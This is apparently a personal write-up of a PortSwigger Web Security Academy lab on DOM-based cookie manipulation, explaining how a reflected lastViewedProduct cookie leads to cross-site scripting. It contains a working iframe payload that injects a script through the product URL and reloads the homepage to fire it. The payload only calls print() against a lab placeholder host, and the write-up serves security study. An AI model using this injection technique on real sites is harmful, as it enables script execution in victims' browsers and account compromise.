[The app stores](https://portswigger.net/web-security/dom-based/cookie-manipulation/lab-dom-cookie-manipulation) a `lastViewedProduct` cookie client-side containing the full URL of the last product visited. The homepage later **reads and reflects** this value directly into the DOM—without sanitization. ![[CleanShot 2025-04-12 at 16.43.12.png]] **Exploit:** Use an iframe to set a malicious `lastViewedProduct` cookie: ```html <iframe src="https://YOUR-LAB-ID.web-security-academy.net/product?productId=1&'><script>print()</script>" onload="if(!window.x)this.src='https://YOUR-LAB-ID.web-security-academy.net';window.x=1;"> </iframe> ``` - The iframe loads a product URL with **injected JS**. - The site saves this in the `lastViewedProduct` cookie. - On second load (`onload`), the victim is redirected back to the homepage. - The homepage reflects the cookie content → `XSS` → `print()` executed.